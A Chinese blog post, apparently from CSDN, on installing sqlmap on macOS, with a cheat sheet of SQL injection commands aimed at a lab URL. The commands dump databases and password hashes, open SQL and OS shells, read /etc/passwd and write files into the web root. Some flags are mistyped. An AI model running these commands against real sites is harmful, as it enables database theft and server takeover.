Mac版 sqlmap 环境配置与常用语法

最新推荐文章于 2023-09-19 16:17:49 发布
最新推荐文章于 2023-09-19 16:17:49 发布
阅读量823 收藏 2
点赞数 2
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45944626/article/details/107352901
版权

Mac版 sqlmap 环境配置与常用语法

一、环境配置

启动:source ~/.bash_profile

  1. cd /usr/bin/
  2. sudo git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev (从git上下载)
  3. open -e .bash_profile添加
    alias sqlmap=‘Python /usr/bin/sqlmap-dev/sqlmap.py‘
  4. source ~/.bash_profile
  5. sqlmap (直接输入就会运行sqlmap啦)

二、常用语法

1. 基础篇

  1. -u 目标url

  2. -d DIRECT 直接连接数据库的连接字符串

  3. -I 日志文件 从burp或者webScarab代理日志文件中分析目标

  4. -x 网站地图URL 从远程网站地图(sitemap.xml)文件来解析目标

  5. -m 文件 将目标地址保存在文件中,一行一个url地址进行批量检测

  6. -r 请求文件

  7. -c 配置文件 从配置ini文件中加载选项

  8. -o 打开所有的优化开关

  9. -predict -output 预测普通查询输出

  10. -keep -alive 使用持久http连接

  11. -null -connection 获取页面长度

  12. -level 执行测试的等级(1-5,默认1)

  13. -risk 执行测试的风险 (1-3,默认1)

  14. -string 查询有效时在页面匹配字符串

  15. -not -string 查询无效时在页面匹配字符串

  16. -regexp 查询有效时在页面匹配正则表达式

  17. -current -user 获取数据库管理系统当前用户

  18. -current -db 获取数据库管理系统当前数据库

  19. -hosname 获取数据库服务器主机名称

  20. -user 枚举数据库管理系统用户

  21. -passwords 枚举数据库管理系统用户密码哈希

  22. -privileges 枚举数据库管理系统用户的权限

  23. -dbs 枚举数据库管理系统数据库

  24. -tables 枚举DBMS数据库中的表

  25. -columns 枚举DBMS数据库表列

  26. -dump 转储数据库表项

2. 注入篇

  1. 检测注入点

    sqlmap -u "http://192.168.1.104/sql.php?id=11"

  2. 爆破所有数据库信息

    sqlmap -u “http://192.168.1.104/sql.php?id=11” –-dbs

    爆破当前数据库的所有信息

    sqlmap -u “http://192.168.1.104/sql.php?id=11” -–current-db

  3. 列出指定数据库所有表名

    sqlmap -u “http://192.168.1.104/sql.php?id=11” -D 爆破出的数据库名 –tables

  4. 列出指定表名的所有列名

    sqlmap -u “http://192.168.1.104/sql.php?id=11” -D vhost48330 -T表名 --columns

  5. dump打印输出表名指定列名字段

    sqlmap -u “http://192.168.1.104/sql.php?id=11” -D vhost48330 -T 表名 -C 列名,列名 --dump

三、 用户权限

  1. 列出数据库管理系统用户:

    sqlmap -u “http://192.168.1.104/sql.php?id=11” --users

  2. 查看当前连接数据库用户:

    sqlmap -u “http://192.168.1.104/sql.php?id=11” --current-user

  3. 判断当前用户是否是DBA?

    sqlmap -u “http://192.168.1.104/sql.php?id=11” --is-dba

    DBA 数据库管理员

  4. 查看用户权限:

    sqlmap -u “http://192.168.1.104/sql.php?id=11” –privileges

    privileges 特权

    sqlmap -u “http://192.168.1.104/sql.php?id=11” --privileges -U fujieace

3. Sqlmap文件操作与shell提权篇

  1. sql shell
    这里通过sqlmap可以直接获取一个sql shell,直接执行 sql语句进行交互
    sqlmap -u “http://192.168.1.104/sql.php?id=11” --sql-shell
    sql-shell> select version();

    注意:这里由于进入了sql shell可以执行sql语句了,也可以用 load data infile、load_file、into outfile等函数来进行文件读取或写入;

  2. cmd shell
    这里通过sqlmap可以直接获取一个cmd shell,直接执行cmd命令进行交互。
    sqlmap -u “http://192.168.1.104/sql.php?id=11” --os-shell
    sqlmap -u “http://192.168.1.104/sql.php?id=11” --os-cmd=ipconfig

  3. 读取服务器上指定文件
    sqlmap -u “http://192.168.1.104/sql.php?id=11” --file-read=/etc/passwd
    sqlmap -u “http://192.168.1.104/sql.php?id=11” --file-read=d:/test.txt

4、写入本地文件到服务器上
sqlmap -u “http://192.168.1.104/sql.php?id=11” --file-write /test/test.txt --file-dest /var/www/html/1.txt

戒罔
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Macsqlmap的使用
柠檬树的专栏
07-03 2715
Macsqlmap的使用 sqlmap -u “url” –dbs (显示数据库) eg: sqlmap -u http://10.10.129.23:8088/getPost.action?postsId=14 --dbs windows下的话sqlmap.py -u “url”—dbs (--dbs:dbs前面有两条杠) 使用burp工具抓取sqlmap发起的请求:首先设...
Windows下Sqlmap环境安装教程详解
09-16
主要介绍了Windows下Sqlmap环境安装,本文通过图文并茂的形式给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下
Mac电脑安装sqlmap环境配置.docx
05-13
介绍在Mac电脑安装sqlmap环境配置的方法
mac 安装sqlmap
qq_33362684的博客
02-06 1786
mac安装sqlmap
Mac OS下安装sqlmap并添加路径
黎振的专栏
10-27 1万+
sudo git clone clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev git clone https://github.com/sqlmapproject/sqlmap.git alias sqlmap='python /Users/driverin/sqlmap/sqlmap.p
Mac下安装SQLmap的安装
weixin_30546933的博客
09-14 1037
1、cd /usr/bin/ 2、sudo git clonehttps://github.com/sqlmapproject/sqlmap.gitsqlmap-dev3、重新打开terminal输入此信息后,回车即可。   alias sqlmap=‘Python/usr/bin/sqlmap-dev/sqlmap.py‘ 但是执行第二条命令的时候,wtf,报错了 你可能...
WindowsSqlmap(下载即可用,无需安装)
04-13
但是官方本的Sqlmap需要安装python环境,对于很多不会安装python环境的朋友造成了困扰,在此特献Windows本的Sqlmap,无需python环境,下载即用,适用于WinXP,Windows7,Windows10,Windows11,支持大部分数据库...
SqlMap免Python环境绿色
02-02
SqlMap免Python环境绿色
最新sqlmap1.3.4.zip
06-28
自动化注入工具,支持如下数据库:MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。适用环境python2
sqlmap安装教程
青空桑
05-22 4143
sqlmap安装教程 需要工具:sqlmap、python2或3、计算机自带的CMD 一、工具安装 1、自行上官网安装sqlmap、python2或3 2、首先安装python 可以无脑点继续,但是在下图的安装选项中,最后一个选项涉及后期环境搭建,可以选择安装,也可以不安,后期手动添加 3、将安装的sqlmap文件夹打开并固定一个名字(SQLMap) 4、将SQLMap打开会发现有一个很长串的文件夹,点开并将里面的文件全部剪切到SQLMap这个文件的目录下 5、将SQLMap文件夹放入已安装好的pytho
(2023-09)Sqlmap for Mac
最新发布
addddnb的博客
09-19 684
渗透测试工具SqlmapMac上的安装与使用
MAC下 安装sqlmap教程
WitherC的练级之路
10-02 3629
准备工具 Terminal 或者 Iterm Python 环境 安装步骤 先去github上面下载并解压sqlmap相关文件 url:https://github.com/sqlmapproject/sqlmap.git 打开 Terminal(这里以terminal为例,因为terminal为系统自带终端) 输入 vi ~/.bash_profile 按 E 进行编辑 输入 ...
mac 下载设置sqlmap
HeTuiPei的博客
08-23 458
首先从github上clone下sqlmap到本地 git clone https://github.com/sqlmapproject/sqlmap.git 然后设置sqlmap命令(注意sqlmap.py选择你自己的路径) alias sqlmap=“python2.7 /Users/用户名/Desktop/library/sqlmap/sqlmap.py” 注意,这种方式在重启后,alias...
Mac mysql 环境变量配置
weixin_51093702的博客
11-16 270
Mac pro 电脑 mysql 环境变量配置
mac环境安装sqlmap,dirsearch
赵花花08042的博客
05-25 2319
先安装python环境 本无所谓。 要选第一个选项 python后面直接接上文件名即可 解压sqlmap文件夹到python27的安装文件夹下 运行不成功 换一个python试一试
mac os 安装 sqlmap
mixboot
07-06 7255
1.sqlmap 安装到mac git clone https://github.com/sqlmapproject/sqlmap.git vim ~/.bash_profile 添加内容 alias sqlmap="/Users/y50/sqlmap/sqlmap.py" source .bash_profile sqlmap -v 参考: 1.MacOS安装sqlmap 2.MAC...
Mac OS 下安装nmap
热门推荐
CSDN 正在崛起的新人---小麦
04-09 2万+
brew install nmapmichael01s-Mac:~ michael01$ nmap 192.168.3.3 Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-08 20:14 PDT Nmap scan report for 192.168.3.3 Host is up (0.0084s latency). Not shown: ...
SQLMAP工具之实战渗透技巧三
Longwaer
02-08 798
学习使用SQLMAP各种小技巧,便于渗透测试中的灵活使用。
sqlmap 清除缓存记录
lieren123567的博客
05-07 1万+
项目场景: sqlmap注入 问题描述: 在sqlmap进行注入时会有缓存记录在 /root/.local/share/sqlmap/output 目录中 解决方案: 在新的注入时应删除缓存记录在进行注入 删除 /root/.local/share/sqlmap/output目录下的缓存文件 rm -rf /root/.s...
怎么查看sqlmap最新本与当前
07-11
要查看 SQLmap 的最新本和当前本,可以按照以下步骤进行操作: 1. 打开命令行终端。 2. 输入以下命令之一来检查 SQLmap 的当前本: - `sqlmap --version` - `sqlmap -v` 这将显示 SQLmap 当前安装的本。 3. 访问 SQLmap 的官方仓库或官方网站(https://github.com/sqlmapproject/sqlmap)。 4. 在仓库或网站上查找最新的发布本。通常,你可以在主页或"Releases"页面中找到最新本的信息。 如果你使用的是 Git 本控制工具进行安装,你可以使用以下命令来获取最新代码并更新到最新本: ``` git pull origin master ``` 通过比较最新本和当前本,你可以确定是否需要更新 SQLmap。请确保在进行任何更新之前备份现有的数据和配置,并遵循官方文档中提供的更新说明和指南来执行更新操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值